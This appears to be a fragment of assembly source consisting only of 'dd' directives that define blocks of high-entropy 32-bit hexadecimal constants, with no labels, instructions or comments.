dd 4A7BB072h, 89FBCED8h, 4D391196h, 4D793A28h, 8BDAF611h
dd 9E3BF426h, 0A3B67F7Ch, 0C864BF60h, 36D35F5Bh, 0C218AF2Ch
dd 7A625D35h, 5109659Dh, 6594B41Ah, 4750748Fh, 0AC1AA801h
dd 25106BF5h, 4DEB948Bh, 4FD47EE5h, 0F07A0D15h, 1D85F75h
dd 0C24C177Eh, 48A0A5BBh, 8022E4B5h, 56A69606h, 9B3520E2h
dd 3DFF6FD3h, 0CA6CAB7Eh, 159D188Fh, 6225E95Fh, 48BA1B13h
dd 668E6E57h, 4FD79A1Bh, 75385C7Bh, 24EEC69Dh, 0F2B53C33h
dd 45C682FBh, 0D7113D5Ah, 136E36E7h, 0D102CE60h, 0D932B093h
dd 0F594D282h, 0B3457787h, 0A2359B0Bh, 17CBE913h, 5EC067B3h
dd 9A4D3E23h, 3C1C036Fh, 0E5108A8Dh, 109EEC8Ah, 0D93F5649h
dd 3AD19AB0h, 20746A49h, 467F1044h, 0D95F746Fh, 0F8E72C41h
dd 9AE8FE3Dh, 0AE069A5Eh, 4C2962F1h, 0F92B2994h, 0CB5BB40Eh
dd 636FABAh, 40CAD095h, 54065079h, 289DF93Ah, 14A16063h
dd 192D91EBh, 866DC3D1h, 96781B7Eh, 2DF5F9CBh, 0B0080BFEh
dd 0D495D8AFh, 2A98DF7Eh, 0EAE91358h, 0F06DB321h, 0A105B29Bh
dd 38DCF2E0h, 0D16FDDDFh, 0C08F6045h, 15BB9F39h, 9E78D819h
dd 6E6AEE21h, 25B13F87h, 0C66702E7h, 0AD456A7Fh, 215005A6h
dd 0A3B9B7FDh, 70D1449h, 0B79F12E6h, 5B5E3F30h, 820D6CECh
dd 44102838h, 7727E2EAh, 0DBBB6174h, 0E8F8038h, 2C6EF35Ch
dd 0CAE6BBE8h, 0E502A27Fh, 5A81E8ECh, 6D01C028h, 855ACD5Eh
dd 0CFC2B99Fh, 2C5391D9h, 6031EB13h, 39479CAFh, 93286CCFh
dd 0E2CAB45Dh, 43E9C853h, 0F5C46261h, 7A0A0344h, 9CE19DF8h
dd 0BB887D14h, 0AF5A8E05h, 0AE57E766h, 0ACA65927h, 96E4E52Eh
dd 253FEA66h, 7A498198h, 27480CEAh, 5B6E2F65h, 0C4ECC890h
dd 5A107DF6h, 5A80430h, 0F3156123h, 8A1A541Ch, 5BC99AF7h
dd 6CC6A9DFh, 86264453h, 15F35521h, 69F11530h, 8CF42542h
dd 0BB5B99DAh, 0EA554A5Eh, 0F72FAA72h, 42C1CC0Eh, 1E77BC5Eh
dd 9358B8D8h, 6D568208h, 0FB0D7355h, 0BF990894h, 0D6DF682Ch
dd 4900D4F9h, 899111A4h, 90B15471h, 121269DEh, 0CBA416D9h
dd 758FF118h, 0D55B1ACAh, 475C8BE6h, 0AE187927h, 0B4EA8BB0h
dd 29236F73h, 93B358A9h, 0D540CA8h, 0C8577111h, 51348CD8h
dd 0E128DFFh, 395D08E6h, 673570A9h, 161AFAF0h, 30A766F2h
dd 4DE88F79h, 0D6C39B3Eh, 0E66CC927h, 9A980BE3h, 259F307Eh
dd 4D913E68h, 8A1E93F4h, 82DE9023h, 574B166Fh, 0A25F7B33h
dd 1522D378h, 0CB1E1B77h, 0EE3A2C08h, 81EBC17Dh, 55E5E5DFh
dd 0FBC05F34h, 7F7204h, 0DB14D811h, 0B57CA4C9h, 0CF2DCD78h
dd 0F206224Fh, 4EE46A6Fh, 184B634h, 9BB700FDh, 1FED9FE7h
dd 0CF6614DAh, 0F2C29FCBh, 0EA9A6149h, 0AD1BB846h, 14D53CF2h
dd 2673CB3h, 92BB70C9h, 71E05EB7h, 0F0BC2D2Ch, 551A7290h
dd 0B29BD8A4h, 587E7AB8h, 0D8F733BAh, 0A404011h, 0D65EEBD8h
dd 70005544h, 48A113h, 5ECA1034h, 0E6C062B6h, 0B7AA7EA5h
dd 0A87CD113h, 4616EFD6h, 0E2479611h, 1E7F0522h, 7099D9FCh
dd 12182518h, 471F2CBBh, 0BD8ED6AAh, 0B0668ACCh, 0D264602Ah
dd 0E81D4270h, 0D69FFA0Ch, 22175515h, 0CD2CB868h, 421337E9h
dd 0FBB77FDFh, 51BBC10Fh, 73765291h, 3AD1F6F3h, 0B3BCB4DAh
dd 351CAD2Fh, 78026547h, 7E708A04h, 6C53D8DCh, 66D83D9Bh
dd 34387DB6h, 0AAFE61A0h, 905A14E8h, 0BB64E34Ch, 76EA828Fh
dd 940EEF1Eh, 9BD19567h, 689A51E9h, 0ABF558B1h, 0B99CA953h
dd 0BE4F65FAh, 57DC872Dh, 0F9E11144h, 0F45B1632h, 23D04C2Eh
dd 9900A905h, 85A0B519h, 5E4BE948h, 29B1B55Bh, 204DEE7Ah
dd 0E7CB57ECh, 0CEA94A2Ch, 9E6EDF4Eh, 0E9A8C271h, 0ED3F134Eh
dd 9F42A4DFh, 0C4E310BEh, 0B30747CBh, 8FA0B5F2h, 7E18822Bh
dd 501C7033h, 1FE75007h, 58691EA8h, 2E81140Eh, 0A848835Dh
dd 3FAC7B2Dh, 0A40F6187h, 0AEAE5445h, 24244DB4h, 5F41E177h
dd 8A294787h, 9150469Eh, 0A9416F3Dh, 0B405B910h, 0CE651053h
dd 85D9B95Bh, 22B55807h, 0B9558B39h, 0BEEC096Fh, 95D2095Eh
dd 0BD36E65Bh, 0C2BC9BADh, 7147AD35h, 34784161h, 0CBA7B458h
dd 0AB1D5F52h, 3F81B048h, 62F0203Eh, 0F6A6FD89h, 636E73FBh
dd 22586DF0h, 70268A2Dh, 0AB0A9BC4h, 959BFD35h, 39AADF74h
dd 154E3DDAh, 0F1B348ECh, 0BC1E87BEh, 10F45AC5h, 0B405E93Fh
dd 7890F09Ch, 496BB537h, 0FF94A0FCh, 37E2DB9Ah, 0AA2D79ABh
dd 40BC25A6h, 101F53CAh, 0BE292574h, 0E2F55694h, 9016E81Fh
dd 6F2B591Fh, 0EE682961h, 44B9B626h, 2F492EAAh, 0D5D3A041h
dd 30D8FF38h, 0D3ED1C7Ch, 75A74F90h, 446BDAEEh, 0CE9B4274h
dd 0D553C7FDh, 0BBE58D7Ch, 72E850B7h, 5DE6746Dh, 1BDADC56h
dd 5842375Eh, 83509055h, 579A3F7Bh, 7C5C8EC1h, 3DA32937h
dd 4490FB3Fh, 2CC8790Ah, 0EC1DEDBFh, 4359068Fh, 2A46035Fh
dd 9E5E4BC5h, 0D367806Eh, 0AAD20A27h, 0C42F0E27h, 9205BC19h
dd 71A1DD9Dh, 5BE6F24Dh, 0A47F0297h, 27DD1CA3h, 8ACC7F1Ah
dd 0D4F51CA3h, 2B8775CEh, 0E76BA201h, 0FDC4705Ch, 500B8ED4h
dd 0D50780CDh, 5F9D23CBh, 9D364205h, 6E13B395h, 0D883D383h
dd 0A99769CBh, 2677EEE0h, 19A2D28Ch, 0E4EA4633h, 0B0AA1C89h
dd 7A4EB98Fh, 2A415E6Ch, 0DB1918AEh, 54D1A92Bh, 2CE6BAEh
dd 0D338AC7Bh, 0A532189Eh, 5D00C8E0h, 7865E6FFh, 19073111h
dd 0F7659D1Ch, 45EE659h, 0C4591B87h, 0F5E9475Fh, 844F611Eh
dd 98E771h, 4B7415C3h, 1B7C1667h, 81779167h, 3D72ECC3h
dd 0BC69392Ch, 5D3FD38Dh, 0C93F8C03h, 0C29119B1h, 0CB4BE0B2h
dd 0E2CFA34Ch, 0DDD9B5B0h, 0D9B3123Fh, 0CC8D6854h, 0D1C476B7h
dd 665B27D5h, 0FD0F10FFh
dd 0A32A8FB7h, 0CDE17EA2h, 0BC497703h, 0F2AE54E1h, 2FE00D4Bh
dd 0C6A88562h, 0E2A9EAC9h, 0F956BDE1h, 697C9234h, 4D9423F4h
dd 0B185A5F5h, 94EA4026h, 2EF0BEA9h, 0E0695EF3h, 274FAA70h
dd 7E506DBCh, 3C0C72E8h, 3AE9B3A8h, 11220CAAh, 4686E287h
dd 90B74813h, 0C3A0C51h, 0F8B5672h, 0C1E99071h, 50E7CDE6h
dd 704612D4h, 96AA836Eh, 640004DAh, 843E3A3Ah, 5718FB8Bh
dd 0C8C0CFB6h, 35E9C6A6h, 0DD5E2729h, 0D09DB3D0h, 82DF2AF8h
dd 490BF911h, 0F04B3EE5h, 0E4A1E8EFh, 0A3E9070Fh, 82C28DA4h
dd 8F6917DEh, 63D15448h, 2B2AB79Bh, 0C50A2C1Eh, 0B543440Bh
dd 19B362C6h, 93F44476h, 0B9C8D5F4h, 378FA0BDh, 6047A3EBh
dd 0F0B06B96h, 881A2EEh, 382B2E35h, 9E510465h, 0C0B0AB3Ch
dd 0E4343E9Fh, 47E0438h, 516D1935h, 1BD0A5A3h, 3B38550Dh
dd 297503E5h, 6168E509h, 677F6E7h, 0D9F28700h, 0DD703285h
dd 280E5A57h, 5563ED1Dh, 2F29D05Fh, 0EEBA6DEDh, 2B8B4220h
dd 0A78584F1h, 5F312D73h, 7F017C16h, 41A8B0DAh, 4777FA61h
dd 34133905h, 6C50E560h, 57D41B23h, 68DB7A16h, 64070E0Ch
dd 1DB32783h, 5F8F7940h, 1ED39223h, 1B2FB638h, 0F96EDE42h
dd 6495F1D4h, 0FDC58DD7h, 0C1047BE2h, 506B8A07h, 0CFE2C3E5h
dd 9F398BC7h, 0FD3C4BA7h, 677B8BF5h, 0F206F09h, 5FF40C8Ah
dd 0DA8B776Eh, 0A3D18575h, 188FEB58h, 7007B525h, 33DA2C01h
dd 7090B7D8h, 0C665BD8Ah, 9FBBAED5h, 53720CF8h, 982F7CC5h
dd 3EEFCC18h, 0F551CB93h, 4FFF09Dh, 2E72E491h, 19F8D515h
dd 0ADDAF807h, 2135778Dh, 6D6C45F2h, 0AC0B363Ch, 93F2B4E0h
dd 7B5B2755h, 0B911585Ch, 2A72659Ah, 0CA9756CBh, 0DE45E472h
dd 97E1364Ah, 0E510C4E3h, 0E6CD292Dh, 13FFD669h, 52EEB0F4h
dd 1C0F4314h, 362148EEh, 8CEFD456h, 0F2B07008h, 6471119h
dd 8257B74Ah, 85401F14h, 0BBAF55E7h, 2B8D83E0h, 5406017Fh
dd 14158C40h, 6B823281h, 26DBF6E0h, 3EFB7B89h, 9DA0E0B0h
dd 30106DE9h, 0EBF16A50h, 13B6AB8Bh, 0E0AC25FAh, 8DB5B357h
dd 8BF748E1h, 4D164858h, 649E2E69h, 0E1C90E28h, 655477Dh
dd 3699ED8Eh, 0E6A4B05Eh, 8C625ACDh, 3A4CDAFDh, 0E70E4A6Fh
dd 61D4CFD9h, 4A61035Dh, 0D34F9CC5h, 27CD5139h, 51317A4Ch
dd 0E9A6311Fh, 0B0142866h, 381C8CB9h, 4E5F6DD2h, 0C2DE04AAh
dd 81F66B8Bh, 0C98D7B2Bh, 946F78BFh, 1D663222h, 3A874571h
dd 0F8D59840h, 0DB8B698Ch, 9DBCE591h, 3E3C9E8h, 1F30BBCDh
dd 0A96B7A15h, 498FF09Dh, 9AAD3383h, 618A26CFh, 0FCE5F8F8h
dd 58967CA6h, 0FCA00240h, 0F71B9836h, 6A5B530Bh, 8B2A8114h
dd 1A0EFBA4h, 72FB3A18h, 2BC5D232h, 0A56AE695h, 5C467538h
dd 23477F3Eh, 0CD6181D6h, 0CDE8EEA2h, 18408680h, 8276EC44h
dd 0EE8A0818h, 5615776Bh, 0DAFE95B4h, 32C672EBh, 0C8715DBCh
dd 0AC2E4B2Ah, 104438ECh, 0DF162B18h, 0EAD56806h, 0DE89589Eh
dd 0F0AD39CAh, 0AF65D28Bh, 281ED413h, 66F94AD4h, 1B9BD8DAh
dd 0DB20794Dh, 69477909h, 22DB8F75h, 0E0DC0A94h, 0A105EAC0h
dd 0F428655Eh, 0B0D0EE9h, 1B7D67B2h, 8389503Ch, 0D077E0E3h
dd 4C943F69h, 23F180A6h, 6AD5CA40h, 0BDA51D76h, 0C31FE15Bh
dd 0EFC2831Dh, 0E4171D90h, 0A8A0062Ah, 0DB7683F5h, 187AF56Bh
dd 0F48F3D8Eh, 0DDBC7350h, 0BB84F9B1h, 66D710E7h, 23FB88DFh
dd 60626626h, 0D60729A7h, 4B3D20CAh, 0F71339F1h, 83CDF0F2h
dd 0E7A4392Ch, 78379CD2h, 1E59FDEFh, 0FE052FBAh, 39071BF4h
dd 0B1406AB5h, 211CFFE3h, 0D2B50523h, 0A55C80E5h, 70D8178Ch
dd 156E96B1h, 46FBC67Dh, 4AD1A4A5h, 8843FBF0h, 0E0CB7426h
dd 265793ADh, 3E7775E9h, 0E9B075FEh, 6CFD9069h, 33A3377Ah
dd 0D30B7B77h, 0FF65AB60h, 919588C5h, 0A40BCE67h, 0A34AD423h
dd 9618E5DFh, 29AD9A95h, 771D77B7h, 2F5DE274h, 1BC372E1h
dd 74604F30h, 5C12F713h, 0AA667A8Bh, 7451302Ch, 2BD7C7C4h
dd 0D3AA7B2Eh, 9EF23730h, 0B2818A3Fh, 0BC4DAFACh, 4D082FE4h
dd 391F611Fh, 0DE69E6B6h, 20AD5223h, 9D85CF23h, 7D692995h
dd 6A5180EDh, 0CAD9AC05h, 1B90EB38h, 9745500Bh, 91C4B56Eh
dd 1E14B34Eh, 1C013EA5h, 0A4B223ECh, 45329E31h, 98058BF6h
dd 38A44EFBh, 7BCEC074h, 0FF18186Fh, 0B16156F6h, 3EDE45AEh
dd 0FE77A6D8h, 4B3CDD52h, 6229921Eh, 0B176D636h, 2695B91Bh
dd 779F5A9h, 0E4ABA6BFh, 0E4EA81D1h, 0ED564920h, 0F2BAED93h
dd 0D3498D51h, 0F320E7E2h, 37D7A980h, 8B5837E5h, 0E7439F3Eh
dd 0B602C570h, 588D26Ah, 29EB19E2h, 876351A8h, 0B0E79898h
dd 0B92D0110h, 1287BF6Eh, 0FD6A8B2Ah, 0C4BF3F03h, 6BAD820Ah
dd 1426CF24h, 0E8C08430h, 1D59877Ah, 14C4FA86h, 0A846AE3Bh
dd 0B3BB0CA6h, 0F456F752h, 8C08B392h, 153457DCh, 54A77CDEh
dd 846457Bh, 0A0A904D2h, 0C38FC331h, 712290EBh, 27302517h
dd 66A8EADAh, 0AD643814h, 0E5FF59A7h, 0C39E3280h, 4AC4C002h
dd 40992988h, 37181C66h, 7859D374h, 323E926h, 0DF0BE4A4h
dd 0D568F717h, 0E9D959BEh, 423E9080h, 2A142170h, 0EBE27A8Eh
dd 1DEBFB4Eh, 0A38A6532h, 0EBC4320Fh, 211117D0h, 0EC59C665h
dd 0B07A10FEh, 1972EBDAh, 0D5F81880h, 1C74FEA8h, 5B825A68h
dd 5A7F4A7Ah, 64AD39F3h, 154437C8h, 0A62A2C96h, 29A36FAFh
dd 33E2A587h, 67AB59B0h, 0F63FE0E2h, 50416F01h, 3D7DAECEh
dd 0B248BB6Ah, 5F43282Fh, 6A069FD7h, 422B4ED8h, 0E559A0D9h
dd 8C4DA688h, 7F97F1EAh, 0F0B1502Dh, 0DB44565Ah, 34675A05h
dd 40E2E784h, 788A2EAFh, 4A35B99Fh, 84989D3Ch, 15800D4Ch
dd 0AA56719Ah, 47BF541Eh, 8707F5D6h, 7E19011Ah, 0C69DB57h
dd 65E82996h, 4BD27866h, 4CD855F4h, 0D334F536h, 0D271290Ch
dd 3118BB0Dh, 0CB07E2ABh, 0FC44A839h, 0D06BB97h, 2C9D3194h
dd 0BEB3CDECh, 1A375842h, 749C05A1h, 9F174198h, 0A7063067h
dd 5AFCF031h, 1AF5F085h, 0E380B9FDh, 4DDD3C1Eh, 0C77BE5A1h
dd 0ECEDF803h, 0B6128EF3h, 529EEEEDh, 0B3955507h, 400F3024h
dd 6D4070FEh, 195F1AEAh, 0E2DA0454h, 5D6CE723h, 6C7E9AAAh
dd 2C5DCA61h, 0D2FC4E10h, 195C531Fh, 7431CA94h, 33332674h
dd 51D51F5Ch, 6958718Ch, 0E332CDDDh, 7B1C6EE1h, 9E6A6E0h
dd 264DC001h, 364E9FC6h, 22815AFAh, 7463876Dh, 0AD8AC6FFh
dd 5FF81840h, 85E15C9Ch, 54B50C6Bh, 2BBC8AD3h, 5038A98Ah
dd 46E83795h, 0D3F26D99h, 0E2A92C56h, 0E3CEC201h, 6EACCC0Fh
dd 611A45C1h, 42961BC9h, 1F4CBD64h, 0FB7B2F77h, 617FAC0Fh
dd 0A98DBE29h, 0E1629E77h, 0F4B69DDBh, 0D577E3E6h, 0C93B3DB2h
dd 6840BBF6h, 2EA18310h, 0A860C455h, 0D53ED94Ah, 0FFF7DF80h
dd 8C376F55h, 9D7F2298h, 0A3723957h, 5891503h, 0D55DA5C7h
dd 941FF0F4h, 2B7872D0h, 236D568Ah, 8FF3079Fh, 0B965B019h
dd 2B3F47Ah, 0A4D29E15h, 0A157DE88h, 2BE560E3h, 2786F6CEh
dd 4BD832F3h, 0DFD1F70Dh, 254F102Dh, 916658A1h, 634FDC99h
dd 3B167045h, 70DAED2Eh, 9F64D99Eh, 66362345h, 0D3BABDDBh
dd 216BE038h, 0F20A9925h, 283E7364h, 9D118D1Bh, 56EAA1Fh
dd 2728D065h, 0BF2CC796h, 82C1FE89h, 0B0170395h, 0D18AD664h
dd 0CCB83DD9h, 65A8EC72h, 8893F45Ah, 0BED5CD2Eh, 0EA002DEDh
dd 13C2F29Ah, 89985F7Eh, 0A1D20DEAh, 3BD3758Dh, 0C0270319h
dd 2AD50D41h, 69A21510h
dd 6A887F88h, 50933F7Bh, 35F18C73h, 0B968A6F6h, 0FE04C6FAh
dd 5608B018h, 0E1E2EB5Fh, 0E67D8B8Fh, 0BD692FBCh, 25B5476Fh
dd 301AB27Ch, 0FC23963h, 0CA48DE72h, 444B9F02h, 0E49E878Bh
dd 48C9449Ch, 51B02E3Dh, 48DF9E01h, 0A03A484Dh, 48F675E7h
dd 298C9D89h, 0B03AF5D2h, 0D1C8D47Dh, 2B0AAC6Ch, 0F8B024B1h
dd 1FD31DEh, 1FEECEF0h, 0FB77935Fh, 0FC3D9B52h, 463765DAh
dd 0E72157C5h, 0ED639AF7h, 1D0C61ADh, 95A306CAh, 0BC45191h
dd 104A5F1Dh, 162E9662h, 0ED1CD97Ah, 81B5D2E4h, 0DEACEE43h
dd 4CA4B587h, 0F5CC1472h, 2CAD760Fh, 79CB734Eh, 0AB321651h
dd 65B3FE93h, 0C62F5C33h, 0D5318F15h, 410CAE16h, 29445ED7h
dd 0B85E3EF1h, 828631D1h, 0A3447CB6h, 315978F9h, 8AA927F6h
dd 13A5743Eh, 8977CA04h, 6D710A8Bh, 31EEFB18h, 1D608A36h
dd 55C95F7Fh, 0BB295987h, 84DFDA2Bh, 69B95661h, 8705D341h
dd 7BA190Fh, 2AF168EEh, 0B2F4A06Ah, 185EE9Ch, 208C40D7h
dd 0E8CD0142h, 8DEE0D5Dh, 0F59FD329h, 8DCE0033h, 0E52DFAEh
dd 5483F20Ah, 0E91AA63Ah, 0C1435710h, 0FE586475h, 0DECB8D2Fh
dd 7FB386C1h, 0CD67F2F4h, 0FF18B70Dh, 0F39E1148h, 0CC0DB2DAh
dd 103F8538h, 288454E0h, 7EDA4FC4h, 2C964915h, 0B69FD586h
dd 0B1DE7481h, 0C781EEFBh, 38E42D6Dh, 648B30E8h, 0C82DCB1Ch
dd 7765C186h, 3346FC02h, 88850C85h, 2C0C74ECh, 3FE41485h
dd 0DA842F8Dh, 0B8E753FBh, 0FA56668Ch, 0EAC96691h, 0AFE9D9D2h
dd 0E0C281h, 15307E94h, 0C2E23B3Fh, 0B24045E1h, 0BDE927F2h
dd 940A0EA4h, 0D1EBA50Fh, 19E5AAB5h, 0C81CBD0Dh, 0AD99E884h
dd 1E27D39Fh, 0F3689723h, 44665E15h, 56B519C2h, 0C1D62738h
dd 0E3E80B4Eh, 0CCEBF6Dh, 376D8F81h, 58B97EE3h, 0CB89FAF5h
dd 0C86091E6h, 1EC30781h, 89662F3Dh, 0CD548F5Ah, 0AF675076h
dd 0F10D5235h, 0E60B8C26h, 0F5280A41h, 3603146Ah, 53AF9D10h
dd 9A372AB6h, 1175D21Bh, 7AC7DF48h, 7DAD3DCEh, 775C89DCh
dd 308AC10Ah, 23E482D5h, 8917B4E2h, 5F385185h, 0ADCA9184h
dd 0EB80CFC4h, 9CCCD778h, 0D3D8B717h, 13BF9E6Fh, 0BCEA0E64h
dd 0BB1B368Dh, 0DEE824CBh, 9588E684h, 2B5742DBh, 3E628B3Fh
dd 74177BBEh, 6ED51C6Eh, 0D16CF822h, 0E8C24BA3h, 3DA1AE6Dh
dd 0B78FE8D7h, 7FE44488h, 9D148255h, 0B6D50E67h, 0F204F08Eh
dd 0B154C1Ah, 0B8DE198Ah, 32D0B270h, 0A2FF7491h, 0D25A94D4h
dd 301BB1BCh, 0DE8D3882h, 92B676A5h, 0D33449EEh, 0D2662FD8h
dd 0C6C7ADADh, 0D02FDE28h, 640C67F0h, 0A4E7138Ah, 9D4F4CF2h
dd 5B863305h, 0CF1FA0A3h, 3B30B9A9h, 0A62A7466h, 0A7FE3814h
dd 3D729E3h, 9C90BA49h, 0E47E39Fh, 0AA4FDF1Eh, 7AB36461h
dd 0A7F3CAA5h, 68A67D31h, 0CD9796FDh, 232E4806h, 5DC7318Fh
dd 0E04A8E17h, 2704FC48h, 0EDAAF861h, 3646F9D8h, 8A712693h
dd 0DDA3183h, 2890D561h, 0B65E7C46h, 548A61CCh, 0C14546A4h
dd 4AF12FDEh, 0D126474Dh, 3110AD57h, 41CF1234h, 8E6DE270h
dd 8624A7AEh, 0FB5CB94Eh, 0C89E30CCh, 0F9C88A55h, 0CC0D3CF0h
dd 0E65A83DAh, 61C764E8h, 0F1C64E47h, 0C9005AAFh, 608FE88Dh
dd 3986BA96h, 31BA4B3Bh, 51F7433Fh, 71DA325Ah, 0D21E3F43h
dd 0B6388885h, 0BD83196Fh, 0E65E3E82h, 0F10D7A48h, 2D312BDBh
dd 0FAD2E382h, 7063E625h, 48A735Dh, 47D5A837h, 139495DAh
dd 88EB06DCh, 88ABAC83h, 0FE7C41A2h, 0BA40A0BDh, 0F7EA2A8Ah
dd 91F66581h, 477C5CAEh, 0B2D285E1h, 774CF88Eh, 3466839Ch
dd 9D42007Fh, 0B085E7B7h, 59FCDBBAh, 6EF2208h, 0DF793ED7h
dd 0EC1990D5h, 370A10C2h, 4B61C981h, 5D101531h, 0B4CE9554h
dd 0D7E3068Dh, 9DBFE149h, 32A01C6Fh, 5F8B9D1Ch, 0C2417F5Bh
dd 7F34929Ch, 36258289h, 55A12650h, 0D3A8DB32h, 4107D1F7h
dd 2D8BFBE3h, 0A7C161CAh, 63EDD0ADh, 0E7B06264h, 0E1909EFFh
dd 28BF1555h, 0F6E5600Dh, 0A21AA522h, 0E89945BCh, 5B5D70A6h
dd 55163941h, 82E7776Bh, 0AC15217h, 0D88D9768h, 1E9050E9h
dd 0D4E126E9h, 0B4326D25h, 1E552361h, 45F7698h, 0CC08E864h
dd 18FA2606h, 0D03B40A1h, 6BA5598Ah, 0C7A591A5h, 2523EFDEh
dd 359B2345h, 3E3C48E5h, 1F419390h, 92611B8Eh, 8AE63B5Ch
dd 0E0E30657h, 0D8005631h, 241442DBh, 1544FA14h, 8C78213Fh
dd 73C32245h, 1D3B7D55h, 6CD3BF69h, 59CA3E3Ch, 7D9626DBh
dd 4149E872h, 0F9CC9E1Eh, 0E4E1DE70h, 4AF81C03h, 0B6C286D1h
dd 870A4882h, 62F01253h, 74496843h, 0BB4668A4h, 0C2461757h
dd 72B00B35h, 293F5E27h, 0B0CA2653h, 0A54B6C61h, 4FA94C08h
dd 1B4EB4FDh, 0D036A113h, 0B810E648h, 44082EE2h, 0D9BECA2Fh
dd 628DFBFBh, 380FF29Ch, 0A7089400h, 2FE882Eh, 37868266h
dd 0F9396B06h, 8777BBCAh, 0E0BF43EBh, 0C5DA1534h, 0D473A2BAh
dd 0E487AA20h, 1E085337h, 8A728BB4h, 311CF42Eh, 0DFFC2861h
dd 9032D4D4h, 0D55FF1F8h, 4BAE686Dh, 0D63C3F2Dh, 0F8B57B80h
dd 38A5CF0Eh, 0FFF54547h, 0B44B4F51h, 7F26AE38h, 38243769h
dd 0F9F6B9A6h, 0FA7CB04Dh, 9F5E168Ah, 4D821C4Bh, 0E323357Dh
dd 1B9E7C31h, 8AE4C180h, 0B365155Ch, 88FD95AFh, 4C93A781h
dd 0F2D6B9E3h, 2AA7A3B4h, 0FE8EC617h, 9AE2D8Eh, 0B5531BC8h
dd 23B18C50h, 371CC5CFh, 50DB72C2h, 0AE89A51Ch, 0FCD1263Eh
dd 2BF05DC0h, 6550D5C4h, 8E84388Bh, 81A62FCEh, 2E3D0759h
dd 26275BE1h, 0B40E78C1h, 7DD34A19h, 8D2A2097h, 0A3114436h
dd 74000280h, 6947A1B5h, 0CCC96240h, 0CC434749h, 0DF740A5Ch
dd 591925F4h, 6885D493h, 2F3DA40Fh, 0D5157AD3h, 0F37EEF47h
dd 0F46405E5h, 1F1F18Ch, 0A46D938Fh, 931026Eh, 57E805CEh
dd 0E4F3D180h, 0C7D6EB4Eh, 0B29F55EEh, 0B93A6617h, 2004AA72h
dd 21828532h, 4376162Fh, 30AC2E17h, 7DBCC2E1h, 0F40EEAAAh
dd 24E13093h, 360B42AAh, 31D0303Dh, 0A06A5E84h, 80595832h
dd 9A6A7128h, 26F60D39h, 52E910D3h, 0FC1E83A4h, 9ED68BC2h
dd 936A0E68h, 16A29A45h, 16F1D4F0h, 0FA2FC88h, 129569A0h
dd 805A1DE6h, 0D0266533h, 65F8C67Eh, 0DC6BABCFh, 0EF42305Ah
dd 2E0290CCh, 0D258420Ah, 0BAE85084h, 8535A0B7h, 0CCEE9F8Fh
dd 0DDDE3F93h, 0E318526Bh, 34F3CA6Bh, 0B9EB3756h, 83F15A3Ah
dd 741723C0h, 5D314D3Bh, 1F401DFEh, 9A912A71h, 8B972C64h
dd 89686228h, 74F8107Ah, 0BE7D0608h, 37DB3D61h, 0B3F8AF1Ah
dd 3ED6C936h, 0B45B7412h, 5DC6DF76h, 0F898B0FFh, 0A574146Eh
dd 59AB6531h, 0C7DC8D83h, 5428881Dh, 4559DCAh, 0C21F5C29h
dd 17121DA4h, 0BFE8FDECh, 0FC19EFF0h, 8C06C605h, 0E7D699EEh
dd 7F22A410h, 70716353h, 0A44C31BEh, 4680673Bh, 0A6E501D6h
dd 95D8D523h, 9EB156CCh, 0E77A0DECh, 154C8108h, 5CD49514h
dd 6E12CF6Dh, 0AA6DAE8Bh, 0E929ABDBh, 7AC1BAC0h, 9A2B536Bh
dd 670611DBh, 478CC940h, 0ED2D9EC1h, 9532C22Ch, 0BD95C815h
dd 9240511Fh, 4480CDA5h, 85CD3655h, 782D763Ch, 0C699772Fh
dd 78EF095h, 559FD23h, 0F16943CAh, 0C105031Ah, 772F2458h
dd 0E7C41A15h, 0BA1B04E3h, 0C7F3C7A7h, 4FCD708Dh, 0F72CAE0Eh
dd 0FF821F4Eh, 0A295C05h, 5A83A6h, 0C9A66D8Eh, 27C8CFEDh
dd 0A5C3F316h, 6A4F1D08h, 23BC0DADh, 16625C3Ch, 91F43B93h
dd 0AE7AB6B2h, 90E3F330h, 0C62479F1h, 0B0196D0h, 5E0F688Ah
dd 0C4FDBEEh, 4B323E95h
dd 0A9502D58h, 0A084E069h, 7B0FE857h, 7B4FF4DFh, 297FA0E5h
dd 28D9FA81h, 651A57D8h, 6012D4E0h, 0CCFA7492h, 0D93FA9BFh
dd 6B1BE06Fh, 50B6D224h, 0C312C933h, 6C2835B9h, 30140D92h
dd 59FA0FADh, 5DA676B2h, 55F27ACh, 8B489CE3h, 634B74C3h
dd 7D9AB5B2h, 47D68331h, 8837833Ch, 5BD0452Dh, 9D6D64DDh
dd 0E9DACCDEh, 23493240h, 0C566D30Dh, 0A7CBA4DEh, 5B00D3BCh
dd 51F5F75Ch, 0EDF5AF06h, 24C9AA44h, 0C46ED289h, 8ABC3F34h
dd 0FF17B23Ah, 3961ABF0h, 75609A1Ch, 0F8E7A4B3h, 0D22B2120h
dd 133BFCE1h, 17991979h, 5E172153h, 0FC543DE3h, 0C07662D2h
dd 0A13C2BC8h, 0C48D863Ch, 7D87A03Eh, 0AED7AB94h, 0E998AF49h
dd 182F6988h, 9EA9C5AFh, 2DC7EBE2h, 0EE11998Ch, 33BD8751h
dd 1D1ABF04h, 0B8525485h, 0CCC23018h, 0A2419BA9h, 24A87B43h
dd 5ADA44C2h, 6859A4E7h, 0F7944DA5h, 0FFA51946h, 4D21E440h
dd 89530F56h, 3459E95Fh, 0FD0F90F9h, 0A4C3C377h, 223C2C3h
dd 3F384213h, 4778880Eh, 2176FF88h, 0D59F83CDh, 2DA57E00h
dd 399BCD8h, 68D1EEA7h, 0B226A5EDh, 0B936C26Eh, 3DDBBF69h
dd 0E2D10216h, 962A3073h, 0A183B634h, 471D9772h, 0CDE72E56h
dd 48221881h, 51493A87h, 6381072Ah, 20DB9717h, 8B816E22h
dd 4C6FC02Bh, 999DF5AEh, 0AF3EB3Ah, 78C4919h, 0B529DF4h
dd 0B384A85Eh, 31721136h, 0E2D232D0h, 14D94BE6h, 0EFA59F89h
dd 2EE1AC26h, 0C8544CF0h, 0ACAA29C5h, 6CACE989h, 0AB44274Ch
dd 4A7B09E5h, 0FAA87FC9h, 445AEB5Dh, 0AC719CE1h, 0BDEE35FDh
dd 55ED28CBh, 9DFB8762h, 0EE387CC2h, 0F4B6181Ch, 0FA32624Fh
dd 48DC142Fh, 0D5565BE8h, 31C7CE21h, 3BF51F7Eh, 8BB67D99h
dd 822A398Bh, 42D0FFA8h, 89DA0982h, 8951111Bh, 6AB0DADFh
dd 0DA8623CAh, 36C65877h, 5AAE7413h, 0B5D60C91h, 0BD7828E7h
dd 0EC6B18Fh, 0A99EF094h, 0A937D295h, 0D1F1E572h, 0EEB1D1B3h
